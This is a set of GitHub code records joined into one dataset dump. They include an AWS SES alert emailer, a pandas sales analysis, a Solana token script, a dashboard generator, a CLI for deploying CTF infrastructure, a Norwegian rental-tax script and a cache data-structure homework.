os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(CWD, '..'))\nfrom monitoring 
import (MONITORING_HOST, SIMMETRICA_CONFIG,\n return_average_for_last_days)\nfrom settings_ses import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY\n\n\ndef get_working_time_events():\n result = []\n with open(SIMMETRICA_CONFIG, 'r') as fh:\n for line in fh:\n if 'name:' not in line:\n continue\n if 'working_time' not in line:\n continue\n result.append(line.strip().rsplit(' ', 1)[1].strip())\n return result\n\n\ndef send_ses(fromaddr, subject, body, recipient, attachment=None,\n filename=''):\n \"\"\"Send an email via the Amazon SES service.\n\n Example:\n send_ses('me@example.com, 'greetings', \"Hi!\", 'you@example.com)\n\n Return:\n If 'ErrorResponse' appears in the return message from SES,\n return the message, otherwise return an empty '' string.\n \"\"\"\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = fromaddr\n msg['To'] = recipient\n msg.attach(MIMEText(body))\n if attachment:\n part = MIMEApplication(attachment)\n part.add_header('Content-Disposition', 'attachment',\n filename=filename)\n msg.attach(part)\n conn = boto.connect_ses(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n result = conn.send_raw_email(msg.as_string())\n return result if 'ErrorResponse' in result else ''\n\n\ndef send_email(warning_msg):\n subject = 'Ranking spiders alert'\n body = warning_msg\n for to in SEND_TO:\n send_ses(fromaddr='noreply@'+MONITORING_HOST, subject=subject,\n body=body, recipient=to.strip())\n\n\nif __name__ == '__main__':\n events = get_working_time_events()\n for event in events:\n avg_time = return_average_for_last_days(event)\n if avg_time is None:\n continue\n if avg_time < MIN_TIME:\n send_email(event + ' is less than '+str(MIN_TIME)+' seconds')\n if avg_time > MAX_TIME:\n send_email(event + ' is more than '+str(MAX_TIME)+' seconds')","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/monitoring/send_alerts.py","file_name":"send_alerts.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39011715892","text":"import pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport pandasql as ps\n\n#Read sample sales data from CSV\n\ndf = pd.read_csv('https://raw.githubusercontent.com/ine-rmotr-curriculum/FreeCodeCamp-Pandas-Real-Life-Example/master/data/sales_data.csv',\n header = [0],\n parse_dates=['Date'], \n skip_blank_lines=True)\n\n\n#Only select rows with a not null Revenue value\n\n\ndf = df[df['Revenue'].notna()]\n\n\n#Create list for salesperson id and add a random value for every record in the sales data. 
\n#Then transpose list to a column and add it to the dataframe \n\n\nSalesperson_id = []\n\nfor x in np.arange(df.shape[0]):\n Salesperson_id.append(random.randint(1,3))\n \ndf['Salesperson_id'] = Salesperson_id\n\n\n#Create dictionary for each salesperson_id and their corresponding name,\n#Convert the dictionary to a dataframe, then join it to the original dataframe using the Salesperson_nm as the key\n\n\nd = {'Salesperson_id': [1, 2, 3], \n 'Salesperson_nm' : ['Bradley','Steve','Kyle']}\ndf2 = pd.DataFrame(data=d)\ndf3 = pd.merge(df,df2,on='Salesperson_id')\n\n\n#Panda SQL query to find revenue per salesperson, then plot the data in a pie chart\n\n\n\ndf4 = ps.sqldf(\"select Salesperson_nm,SUM(Revenue) as Revenue from df3 group by Salesperson_nm\")\ndf4.set_index('Salesperson_nm')\n\n\nlabels = df4['Salesperson_nm']\nrevs = df4['Revenue']\n\n\npatches, texts = plt.pie(revs, startangle=90)\nplt.legend(patches, labels, loc=\"best\")\nplt.title(\"Revenue Distribution\")\nplt.axis('equal')\n\n\n#Panda SQL queries to find out revenue of each salesperson per day in the year 2013\n#Then merge the query results into 1 dataframe\n\n\ndf5 = ps.sqldf(\"select Date,SUM(Revenue) as Bradley_revenue from df3 where Salesperson_nm = 'Bradley' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\ndf6 = ps.sqldf(\"select Date,SUM(Revenue) as Steve_revenue from df3 where Salesperson_nm = 'Steve' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\ndf7 = ps.sqldf(\"select Date,SUM(Revenue) as Kyle_revenue from df3 where Salesperson_nm = 'Kyle' AND (Date > '2013-01-01') AND (Date < '2014-01-01') group by Date\")\n\n\nmerged1 = pd.merge(df5,df6,on=\"Date\")\nmerged2 = pd.merge(merged1,df7,on=\"Date\")\n\nmerged2['Date'] = pd.to_datetime(merged2['Date']).dt.date\nmerged2.set_index('Date')\n\n#merged2.head()\n\n#Divide outlier daily revenue values for Bradley by 3\n\nmerged2.loc[merged2['Bradley_revenue'] > 50000, 'Bradley_revenue'] = merged2.loc[merged2['Bradley_revenue'] > 50000, 'Bradley_revenue'] / 3\n\n\n#Plot Bradley's revenue in 2013\n\nmerged2.plot(x='Date', y='Bradley_revenue');\n","repo_name":"Kurt-Blair/Python-Sales-Analysis","sub_path":"Sales data analysis.py","file_name":"Sales data analysis.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42355923768","text":"import logging\nimport sys\nimport time\n\nfrom nftools.solana import get_rpc, update_rpc\nfrom nftools.utils import query_yes_no, run_command, string_between\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nCLUSTER = get_rpc()\n\n\ndef confirm_rpc(cluster):\n if cluster != get_rpc():\n query_yes_no(\n f'Cluster {cluster} does not equal default {CLUSTER}. 
Are you sure you want to update your RPC?',\n break_message='Update request denied.')\n update_rpc(cluster)\n\n logger.info(f'Using {cluster} as RPC URL.')\n\n\ndef create_token_mint():\n command = ['spl-token', 'create-token', '--decimals', '0']\n logger.info(f'Creating white list token.')\n process = run_command(command)\n print(process)\n token = string_between(process.stdout, 'Creating token ', '')\n\n if token is None:\n raise ValueError(f'Failed to create token: {process.stderr}')\n\n return token\n\n\ndef create_token_account(token):\n command = ['spl-token', 'create-account', token]\n logger.info(f\"Creating token account for {token}.\")\n process = run_command(command)\n if process.returncode != 0:\n raise RuntimeError(f'Failed to create token account for {token}.')\n\n logger.info(f'Successfully created token account for {token}.')\n\n\ndef mint_token(token, amount):\n command = ['spl-token', 'mint', token, str(amount)]\n logger.info(f'Minting {amount} of token {token}.')\n process = run_command(command)\n if process.returncode != 0:\n logger.warning(f'Minting {amount} of {token} failed! {process.stderr}')\n sys.exit(0)\n logger.info(f'Successfully minted {amount} of {token}.')\n\n\ndef create_wl_token(amount, cluster):\n # Confirm RPC Is Correct\n confirm_rpc(cluster)\n\n # Create Token and Token Account\n token = create_token_mint()\n create_token_account(token)\n\n # Wait for Token Account Confirmation\n time.sleep(5)\n\n mint_token(token.strip(), amount)\n return token\n","repo_name":"akajimeagle/nftools","sub_path":"nftools/create_whitelist_token.py","file_name":"create_whitelist_token.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27099177264","text":"from bson import ObjectId\nfrom src.app.services.styleHandler import check_dashboard_visualization_style, \\\n create_dashboards_for_grafana, create_dashboards_for_kibana\nfrom src.app.services.http_dispatcher import post_grafana_dashboard, post_kibana_dashboard\nfrom src.app.services.grafana_renderer import *\nfrom src.app.services.kibana_renderer import *\nimport os\nfrom src.app.utils.logger import get_logger\nimport json\n\n\nlogger = get_logger(__name__)\n\n\ndef meta_model_interpreter(message):\n meta_model = json.loads(message)\n viz_tool = os.environ.get('SELECTED_TOOL')\n selected_datasource = os.environ.get('SELECTED_DATASOURCE')\n dashboard_style = 'null'\n model_uid = 'null'\n dashboards = []\n\n for meta_model_key, meta_model_value in meta_model.items():\n if meta_model_key == \"_id\":\n model_uid = ObjectId(meta_model_value)\n elif meta_model_key == \"dashboardpages\":\n dashboard_style = check_dashboard_visualization_style(meta_model_value)\n if viz_tool == 'grafana':\n dashboards = create_dashboards_for_grafana(meta_model_value, dashboard_style, model_uid, selected_datasource)\n else:\n dashboards = create_dashboards_for_kibana(meta_model_value, dashboard_style, model_uid, selected_datasource)\n logger.debug(\"Meta Model Interpreted \")\n logger.debug(\"Style Recognized!\")\n logger.debug(dashboard_style)\n logger.debug(\"Panels Created\")\n logger.debug(\"Final Dashboards Ready\")\n if viz_tool == 'grafana':\n if selected_datasource == 'Elasticsearch':\n final_dashboards = load_grafana_templates(dashboards, dashboard_style, 'Elasticsearch')\n if selected_datasource == 'Prometheus':\n final_dashboards = load_grafana_templates(dashboards, dashboard_style, 'Prometheus')\n else:\n final_dashboards = 
load_kibana_templates(dashboards, dashboard_style, 'Elasticsearch')\n return dashboards\n\n\n\n\n\n\n","repo_name":"omarghetti/Dynamic-Dashboard-Generator","sub_path":"src/app/services/MetaModelInterpreter.py","file_name":"MetaModelInterpreter.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31956760367","text":"import sys\nfrom os import getcwd\nfrom os.path import join\nfrom re import findall\n\nimport git # type: ignore\nimport click\nimport yaml\nfrom click.core import Context\nfrom yaspin import yaspin # type: ignore\nfrom marshmallow_dataclass import class_schema\n\nfrom ctfkit.constants import SPINNER_SUCCESS, SPINNER_FAIL, SPINNER_MODEL\nfrom ctfkit.models import HostingEnvironment, HostingProvider\nfrom ctfkit.models.ctf_config import CtfConfig, DeploymentConfig, GcpConfig\nfrom ctfkit.utility import ConfigLoader, mkdir, touch, is_slug\n\nfrom ctfkit.manager.vpn_manager import VPNManager\n\n\npass_config = click.make_pass_decorator(CtfConfig)\n\nCtfDeployment = None\n\n@click.group()\n@click.pass_context\ndef cli(context: Context):\n \"\"\"Manage your CTF infrastructure\"\"\"\n global CtfDeployment\n from ctfkit.terraform import CtfDeployment\n\n@cli.command('init')\n@click.option(\"-n\", \"--ctf-name\", type=str, prompt=True)\n@click.option('-p', '--provider', prompt=True,\n type=click.Choice(list(map(lambda e: e.value, HostingProvider))))\ndef init(ctf_name: str, provider: str) -> None:\n \"\"\"\n Create a CTF repository in the current working directory\n\n :param ctf_name: The name of the CTF\n :param provider: The provider which will host the CTF\n \"\"\"\n # Check if the given name is valid\n if not is_slug(ctf_name):\n sys.exit(1)\n\n path = getcwd()\n ctf_path = join(path, ctf_name)\n\n # Create the CTF's directory\n mkdir(ctf_path)\n\n # Init the CTF git repo\n repo = git.Repo.init(ctf_path)\n\n # One CTF directory will be like so:\n # /ctf_name/\n # challenges/ # all challenges hosted on the CTF\n # config/ # the configuration files of the CTF\n # README.md # a dummy README file to introduce the CTF\n\n # We initiate the CTF's directory with default files\n readme_default_file = \"README.md\"\n default_dirs = [\"challenges\"]\n default_files = [readme_default_file, 'ctf.yaml']\n\n # Create all directories with .gitkeep file to preserve them if empty\n for default in default_dirs:\n dir_ = join(ctf_path, default)\n mkdir(dir_)\n gitkeep = join(dir_, \".gitkeep\")\n touch(gitkeep)\n repo.index.add(gitkeep)\n\n # Create all files and add them into the repo\n for default in default_files:\n file_path = join(ctf_path, default)\n touch(file_path)\n # Fill the README file with default content\n if default == readme_default_file:\n with open(file_path, 'w') as file_:\n file_.write(f\"# [CTF Kit] {ctf_name}\\n\")\n \n elif default == \"ctf.yaml\":\n config = CtfConfig(\n kind='ctf',\n name=ctf_name,\n deployments=[DeploymentConfig(\n internal_domain=f'{ctf_name}.ctf',\n environment=HostingEnvironment.TESTING,\n provider=HostingProvider.GCP,\n gcp=GcpConfig(\n project='change-this-123',\n machine_type='e1-standard-2',\n region='europe-west1',\n zone='europe-west1-b'\n )\n )]\n )\n with open(file_path, 'w') as file_:\n file_.write(yaml.dump(class_schema(CtfConfig)().dump(obj=config), sort_keys=False))\n\n repo.index.add(default_files)\n\n repo.index.commit(f\"CTF Kit ctf '{ctf_name}' initial commit\")\n print(f\"Done! 
You can check it at {ctf_path}\")\n\n\n@cli.command('plan')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef plan(config: str, environment: str):\n \"\"\"\n List planned infrastructure modifications\n\n Generate terraform configuration and list planned addition, deletion and modification\n \"\"\"\n\n ctf_config = ConfigLoader(CtfConfig).convert(config)\n\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(ctf_config.teams)\n\n # Declare our terraform stack\n app = create_deployment(ctf_config, environment_e)\n\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.plan()\n\n\n@cli.command('deploy')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef deploy(config: str, environment: str):\n \"\"\"\n Generate terraform configuration files\n from the ctf configuration and deploy required changes\n \"\"\"\n\n config = ConfigLoader(CtfConfig).convert(config)\n\n # Find the requested environment\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(config.teams)\n\n # Declare our terraform stack\n app = CtfDeployment(config, environment_e, outdir=join(getcwd(), '.tfout', environment))\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.deploy()\n\n # Extract outputs from deployement\n outputs = app.get_outputs()\n if 'servers' in outputs:\n with yaspin(SPINNER_MODEL, text='Generating VPN configurations ...'):\n servers = outputs['servers']['value']\n services_cidr = outputs['services_cidr']['value']\n\n VPNManager.generate_clients_config(config.teams, servers, services_cidr)\n\n\n@cli.command('destroy')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef destroy(config: CtfConfig, environment: str):\n \"\"\"\n Generate terraform configuration files\n from the ctf configuration and deploy required changes\n \"\"\"\n\n config = ConfigLoader(CtfConfig).convert(config)\n\n # Find the requested environment\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(config.teams)\n\n app = CtfDeployment(config, environment_e, outdir=join(getcwd(), '.tfout', environment))\n\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.destroy()\n\n\n\ndef create_deployment(config: CtfConfig, environment: HostingEnvironment) -> any:\n outdir = join(getcwd(), '.tfout', environment.value)\n mkdir(outdir)\n\n return CtfDeployment(config, environment, outdir=outdir)\n\nclass TfHelpers:\n \"\"\"\n Infrastructure related helpers\n \"\"\"\n\n infra: any\n\n def __init__(self, infra: any) -> None:\n self.infra = infra\n\n def init(self) -> None:\n \"\"\"\n Wrap call to terraform init with a spinner\n \"\"\"\n\n with yaspin(SPINNER_MODEL, text=\"Downloading modules ...\") as spinner:\n _, stderr = self.infra.init()\n\n if len(stderr) > 0:\n spinner.fail(SPINNER_FAIL + stderr)\n else:\n spinner.ok(SPINNER_SUCCESS)\n\n def synth(self) -> None:\n \"\"\"\n Wrap call to 
terraformcdk synth() method while showing a spinner\n \"\"\"\n with yaspin(SPINNER_MODEL, text=\"Generating infrastructure configuration ...\") as spinner:\n mkdir('.tfout')\n self.infra.synth()\n spinner.ok(SPINNER_SUCCESS)\n\n def plan(self) -> None:\n \"\"\"\n Wrap call to terraform plan and show result on spinner\n \"\"\"\n\n text = \"Planning infrastructure ...\"\n with yaspin(SPINNER_MODEL, text=text) as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = text + line.strip('\\n')\n\n exit_code, stdout, _ = self.infra.plan(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n print('\\n'.join(findall(r'(.+resource \"[^\"]+\" \"[^\"]+\") \\{', stdout)))\n else:\n spinner.fail(SPINNER_FAIL + f'Command exited with code {exit_code}')\n\n def deploy(self) -> None:\n \"\"\"\n Wrap call to terraform apply while showing stdout on a spinner\n \"\"\"\n\n with yaspin(SPINNER_MODEL, text='Starting terraform ...') as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = 'Deploying infrastructure : ' + line.strip('\\n')\n\n exit_code, _, _ = self.infra.apply(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n else:\n spinner.fail(f'{SPINNER_FAIL} Command exited with code {exit_code}')\n\n def destroy(self) -> None:\n \"\"\"\n Wrap a call to terraform destroy while showing stdout on a spinner\n \"\"\"\n\n text = \"Destroying infrastructure ...\"\n with yaspin(SPINNER_MODEL, text=text) as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = text + line.strip('\\n')\n\n exit_code, _, _ = self.infra.destroy(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n else:\n spinner.fail(f'{SPINNER_FAIL} Command exited with code {exit_code}')\n","repo_name":"Team-FakeNews/CTFKit","sub_path":"ctfkit/cli/ctf.py","file_name":"ctf.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21731634717","text":"print(\"INFO \\n Dette programmet besvarer om din utleie av egen bolig er skattepliktig.\\n Først trenger vi å vite hvor stor del av boligen du har leid ut.\\n Angi dette i prosent, 100 betye hele boligen, 50 betyr halve, \\n 20 er mindre del av boligen som f.eks. en hybel.\")\r\n\r\nrentType = input(\"Leier du ut egen bolig (E/e), Sekundærbolig (S/s), eller Fritidsbolig (F/f)?\")\r\nvacationPurpose = \"\"\r\nvacationHouses = 0\r\nvacationIncome = 0\r\nvacationLimit = 10000\r\n\r\ntaxExceeding = 0\r\ntaxPrHouse = 0\r\ntaxTotal = 0\r\n\r\nrentPercent = 0\r\nrentYear = 0\r\nrentLimit = 20000\r\n\r\n\r\n\r\nif rentType == \"E\" or rentType == \"e\":\r\n rentPercent = int(input(\"Oppgi, i prosent, hvor mye av boligen som ble utleid: \"))\r\n rentYear = int(input(\"Skriv inn hva du har hatt i leieinntekt: \"))\r\n\r\n if rentPercent < 50:\r\n print(\"Inntekten er ikke skattepliktig.\")\r\n if rentYear >= rentLimit:\r\n print(\"Inntekten er skattepliktig.\\nSkattepliktigbeløp er: \", rentYear)\r\n\r\n elif rentYear >= rentLimit:\r\n print(\"Inntekten er skattepliktig.\\nSkattepliktigbeløp er: \", rentYear)\r\nelif rentType == \"S\" or rentType == \"s\":\r\n print(\"lol\")\r\nelif rentType == \"F\" or rentType == \"f\":\r\n vacationPurpose = input(\"Skriv inn formålet med fritidboligen(e) (Fritid/Utleie): \")\r\n vacationHouses = int(input(\"Skriv inn hvor mange fritidsboliger du leier ut: \"))\r\n vacationIncome = int(input(\"Skriv inn utleieinntekten pr. 
fritidsbolig: \"))\r\n\r\n if vacationPurpose == \"Fritid\" or vacationPurpose == \"fritid\":\r\n print(\"\")\r\n\r\n","repo_name":"HHorge/ITGK","sub_path":"ITGK Øving 2/Skatteetaten.py","file_name":"Skatteetaten.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72504317315","text":"# HW4\n#Due Date: 04/17/2021, 11:59PM\n# Isha Thukral\n\n\"\"\" \n### Collaboration Statement: Worked with TA (chandu)\n \n\"\"\"\nclass Node:\n def __init__(self, content):\n self.value = content\n self.next = None\n\n def __str__(self):\n return ('CONTENT:{}\\n'.format(self.value))\n\n __repr__=__str__\n\n\nclass ContentItem:\n '''\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content3 = ContentItem(1005, 18, \"Content-Type: 2\", \"
'CMPSC132'
\")\n >>> content4 = ContentItem(1005, 18, \"another header\", \"111110\")\n >>> hash(content1)\n 0\n >>> hash(content2)\n 1\n >>> hash(content3)\n 2\n >>> hash(content4)\n 1\n '''\n def __init__(self, cid, size, header, content):\n self.cid = cid\n self.size = size\n self.header = header\n self.content = content\n\n def __str__(self):\n return f'CONTENT ID: {self.cid} SIZE: {self.size} HEADER: {self.header} CONTENT: {self.content}'\n\n __repr__=__str__\n\n def __eq__(self, other):\n if isinstance(other, ContentItem):\n return self.cid == other.cid and self.size == other.size and self.header == other.header and self.content == other.content\n return False\n\n def __hash__(self):\n # YOUR CODE STARTS HERE\n sum = 0\n for c in self.header:\n sum += ord(c)\n return sum %3 #0,1,2\n\n\n\nclass CacheList:\n ''' \n # An extended version available on Canvas. Make sure you pass this doctest first before running the extended version\n\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content3 = ContentItem(1005, 180, \"Content-Type: 2\", \"
'CMPSC132'
\")\n >>> content4 = ContentItem(1006, 18, \"another header\", \"111110\")\n >>> content5 = ContentItem(1008, 2, \"items\", \"11x1110\")\n >>> lst=CacheList(200)\n >>> lst\n REMAINING SPACE:200\n ITEMS:0\n LIST:\n \n >>> lst.put(content1, 'mru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> lst.put(content2, 'lru')\n 'INSERTED: CONTENT ID: 1004 SIZE: 50 HEADER: Content-Type: 1 CONTENT: 110010'\n >>> lst.put(content4, 'mru')\n 'INSERTED: CONTENT ID: 1006 SIZE: 18 HEADER: another header CONTENT: 111110'\n >>> lst.put(content5, 'mru')\n 'INSERTED: CONTENT ID: 1008 SIZE: 2 HEADER: items CONTENT: 11x1110'\n >>> lst.put(content3, 'lru')\n \"INSERTED: CONTENT ID: 1005 SIZE: 180 HEADER: Content-Type: 2 CONTENT:
'CMPSC132'
\"\n >>> lst.put(content1, 'mru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> 1006 in lst\n True\n >>> contentExtra = ContentItem(1034, 2, \"items\", \"other content\")\n >>> lst.update(1008, contentExtra)\n 'UPDATED: CONTENT ID: 1034 SIZE: 2 HEADER: items CONTENT: other content'\n >>> lst\n REMAINING SPACE:170\n ITEMS:3\n LIST:\n [CONTENT ID: 1034 SIZE: 2 HEADER: items CONTENT: other content]\n [CONTENT ID: 1006 SIZE: 18 HEADER: another header CONTENT: 111110]\n [CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA]\n \n >>> lst.clear()\n 'Cleared cache!'\n >>> lst\n REMAINING SPACE:200\n ITEMS:0\n LIST:\n \n '''\n def __init__(self, size):\n self.head = None\n self.maxSize = size\n self.remainingSpace = size\n self.numItems = 0\n\n def __str__(self):\n listString = \"\"\n current = self.head\n while current is not None:\n listString += \"[\" + str(current.value) + \"]\\n\"\n current = current.next\n return 'REMAINING SPACE:{}\\nITEMS:{}\\nLIST:\\n{}'.format(self.remainingSpace, self.numItems, listString) \n\n __repr__=__str__\n\n def __len__(self):\n return self.numItems\n \n def put(self, content, evictionPolicy):\n # YOUR CODE STARTS HERE\n\n #use contains \n if content.cid in self: # already present\n return f\"Content {content.cid} already in cache, insertion not allowed\" \n if content.size > self.maxSize: # if its greater than maxSize\n return \"Insertion not allowed\"\n \n contentNode = Node(content)\n\n\n if content.size > self.remainingSpace: # have to get rid of most first or last depending on evicition\n # evictionPolicy\n if evictionPolicy == 'lru': #Removes the last (least recently used\n while not content.size <= self.remainingSpace:\n self.lruEvict()\n\n else:\n while not content.size <= self.remainingSpace: # else most recently used\n self.mruEvict()\n \n contentNode.next = self.head # readjusting head\n self.head = contentNode \n self.numItems += 1 # icreasing num of items \n self.remainingSpace -= content.size # and decreasing the remaining space\n \n return \"INSERTED: \"+str(content)\n \n def __contains__(self, cid):\n # YOUR CODE STARTS HERE\n if self.numItems == 0:\n return False\n\n prev = None\n curr = self.head\n if self.head.value.cid == cid: # finding if Content Item is in list by id\n return True\n\n while curr: # using while loop till the item is the head\n if curr.value.cid == cid:\n\n prev.next = curr.next\n curr.next = self.head\n self.head = curr\n return True\n \n prev = curr\n curr = curr.next\n\n return False\n\n\n def update(self, cid, content):\n # YOUR CODE STARTS HERE\n if cid in self:\n if self.remainingSpace + self.head.value.size >= content.size: # while remaining space and size is greater than content\n self.remainingSpace = self.remainingSpace + self.head.value.size - content.size # us put in list and subtract remaining space\n self.head.value = content # updates to the head\n return \"UPDATED: \"+str(content)\n else:\n return \"Cache miss!\"\n else:\n return \"Cache miss!\"\n\n\n def mruEvict(self):\n # YOUR CODE STARTS HERE\n # removes the first node\n prevhead = self.head\n\n self.head = self.head.next # making next item head\n\n self.remainingSpace += prevhead.value.size # increasing remaing space\n self.numItems -= 1 # decrease number of items\n return \"REMOVED: \"+str(prevhead.value) \n\n \n def lruEvict(self):\n # YOUR CODE STARTS HERE\n # remove the last node\n curr = self.head\n prev = None\n while curr.next: # traverse till curr.next doesn't equal none\n prev = curr # making item 
before the last node\n curr = curr.next # and current equal to none \n \n if curr == self.head:\n self.head = None\n else:\n prev.next = None\n\n self.remainingSpace += curr.value.size # same as above \n self.numItems -= 1\n return \"REMOVED: \"+str(curr.value) \n\n\n \n def clear(self):\n # YOUR CODE STARTS HERE\n # Removes all items from the list.\n self.head = None\n self.numItems = 0\n self.remainingSpace = self.maxSize\n return \"Cleared cache!\"\n\n\nclass Cache:\n \"\"\"\n # An extended version available on Canvas. Make sure you pass this doctest first before running the extended version\n\n >>> cache = Cache()\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1003, 13, \"Content-Type: 0\", \"0xD\")\n >>> content3 = ContentItem(1008, 242, \"Content-Type: 0\", \"0xF2\")\n\n >>> content4 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content5 = ContentItem(1001, 51, \"Content-Type: 1\", \"110011\")\n >>> content6 = ContentItem(1007, 155, \"Content-Type: 1\", \"10011011\")\n\n >>> content7 = ContentItem(1005, 18, \"Content-Type: 2\", \"
'CMPSC132'
\")\n >>> content8 = ContentItem(1002, 14, \"Content-Type: 2\", \"
'PSU'
\")\n >>> content9 = ContentItem(1006, 170, \"Content-Type: 2\", \"\")\n\n >>> cache.insert(content1, 'lru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> cache.insert(content2, 'lru')\n 'INSERTED: CONTENT ID: 1003 SIZE: 13 HEADER: Content-Type: 0 CONTENT: 0xD'\n >>> cache.insert(content3, 'lru')\n 'Insertion not allowed'\n\n >>> cache.insert(content4, 'lru')\n 'INSERTED: CONTENT ID: 1004 SIZE: 50 HEADER: Content-Type: 1 CONTENT: 110010'\n >>> cache.insert(content5, 'lru')\n 'INSERTED: CONTENT ID: 1001 SIZE: 51 HEADER: Content-Type: 1 CONTENT: 110011'\n >>> cache.insert(content6, 'lru')\n 'INSERTED: CONTENT ID: 1007 SIZE: 155 HEADER: Content-Type: 1 CONTENT: 10011011'\n\n >>> cache.insert(content7, 'lru')\n \"INSERTED: CONTENT ID: 1005 SIZE: 18 HEADER: Content-Type: 2 CONTENT:
'CMPSC132'
\"\n >>> cache.insert(content8, 'lru')\n \"INSERTED: CONTENT ID: 1002 SIZE: 14 HEADER: Content-Type: 2 CONTENT:
'PSU'
\"\n >>> cache.insert(content9, 'lru')\n \"INSERTED: CONTENT ID: 1006 SIZE: 170 HEADER: Content-Type: 2 CONTENT: \"\n >>> cache\n L1 CACHE:\n REMAINING SPACE:177\n ITEMS:2\n LIST:\n [CONTENT ID: 1003 SIZE: 13 HEADER: Content-Type: 0 CONTENT: 0xD]\n [CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA]\n \n L2 CACHE:\n REMAINING SPACE:45\n ITEMS:1\n LIST:\n [CONTENT ID: 1007 SIZE: 155 HEADER: Content-Type: 1 CONTENT: 10011011]\n \n L3 CACHE:\n REMAINING SPACE:16\n ITEMS:2\n LIST:\n [CONTENT ID: 1006 SIZE: 170 HEADER: Content-Type: 2 CONTENT: ]\n [CONTENT ID: 1002 SIZE: 14 HEADER: Content-Type: 2 CONTENT:
'PSU'
]\n \n \n \"\"\"\n\n def __init__(self):\n self.hierarchy = [CacheList(200), CacheList(200), CacheList(200)]\n self.size = 3\n \n def __str__(self):\n return ('L1 CACHE:\\n{}\\nL2 CACHE:\\n{}\\nL3 CACHE:\\n{}\\n'.format(self.hierarchy[0], self.hierarchy[1], self.hierarchy[2]))\n \n __repr__=__str__\n\n\n def clear(self):\n for item in self.hierarchy:\n item.clear()\n return 'Cache cleared!'\n\n \n def insert(self, content, evictionPolicy):\n # YOUR CODE STARTS HERE\n # insert item into the correct level\n level = hash(content) \n return self.hierarchy[level].put(content,evictionPolicy) # this is done through hierarchy\n # putting the content based on eviction policy \n\n def __getitem__(self, content):\n # YOUR CODE STARTS HERE\n level = hash(content)\n if content.cid in self.hierarchy[level]: #invokes __contains__ method\n return self.hierarchy[level].head.value\n else:\n return \"Cache miss!\"\n\n\n\n def updateContent(self, content):\n # YOUR CODE STARTS HERE\n level = hash(context)\n # upadting invoking __contains__ method\n return self.hierarchy[level].update(content.cid, content) ","repo_name":"ithukral/Isha-Coding-Projects-","sub_path":"Intership Code/HW4.py","file_name":"HW4.py","file_ext":"py","file_size_in_byte":11800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9240358661","text":"import os\n\n\nexclude_dir = {'编程资料'}\n\n\ndef scan_file(path, level, target):\n filenames = os.listdir(path) # 返回path目录下的所有文件名称\n for filename in filenames:\n cur_path = path + \"/\" + filename\n if level == 0:\n cur_path = filename\n if 